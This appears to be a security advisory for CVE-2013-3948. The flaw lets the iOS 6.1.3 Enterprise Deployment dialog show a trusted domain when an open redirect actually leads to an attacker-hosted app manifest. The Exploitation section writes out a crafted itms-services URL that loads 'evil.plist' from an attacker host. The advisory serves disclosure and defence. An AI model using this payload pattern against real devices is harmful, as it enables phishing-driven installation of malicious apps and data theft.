CVE-2013-3948

Vulnerability

Apple iOS 6.1.3 does not follow redirects during hostname determination for the Enterprise Deployment installation dialog. When processing a itms-services:// URL with a download-manifest parameter, the OS displays the original redirect hostname instead of the final destination. This allows an attacker to leverage an open redirect vulnerability on a trusted domain to host a malicious manifest. Affected versions: iOS prior to 7.1 (as referenced in [1]).

Exploitation

An attacker needs a trusted domain that contains an open redirect endpoint. The attacker crafts a URL such as itms-services://?action=download-manifest&url=https://trusted.example.com/redirect?url=https://attacker.com/evil.plist. When the user visits this link (e.g., via a phishing email or malicious webpage), iOS opens the Enterprise Deployment dialog showing the trusted domain name rather than the attacker's domain. The user, seeing a trusted source, may approve the installation. No additional authentication or user interaction beyond tapping "Install" is required [1].

Impact

Successful exploitation allows the attacker to install an arbitrary application on the victim's iOS device without the user realizing the app is from an untrusted source. The application runs with the same sandbox restrictions as any App Store app, but it can exfiltrate data, display phishing interfaces, or abuse enterprise capabilities. The attack subverts the user's ability to make an informed trust decision [1].

Mitigation

Apple addressed this issue in iOS 7.1, released on March 10, 2014 [1]. Users should update to iOS 7.1 or later. There is no workaround for iOS 6.1.3 or earlier versions. The vulnerability is not listed on CISA KEV.